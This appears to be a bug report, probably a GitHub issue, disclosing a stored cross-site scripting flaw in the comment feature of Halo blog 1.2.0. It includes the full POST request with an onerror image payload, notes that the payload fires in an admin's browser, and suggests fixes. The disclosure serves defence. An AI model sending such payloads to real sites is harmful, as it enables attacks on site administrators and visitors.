Skip to content

Stored xss on Halo blog

Created by: rank0

Environment

Server Version:1.2.0 Admin Version:1.2.0 DataBase:H2

Vulnerability details

Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered.

step1: submit comment

image The post packet is as follows:

POST /api/content/posts/comments HTTP/1.1
Host: 192.168.0.104:8090
Content-Length: 132
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.0.104:8090
Referer: http://192.168.0.104:8090/archives/hello-halo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}

step2: view the blog post

After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser.

image image

code: src/main/java/run/halo/app/controller/content/api/PostController.java image

Suggestions for repair

  • Proper encoding of untrusted request data
  • Rich text filtering uses a common security API library for each programming language
  • Escaping special characters using the developer's secure escape library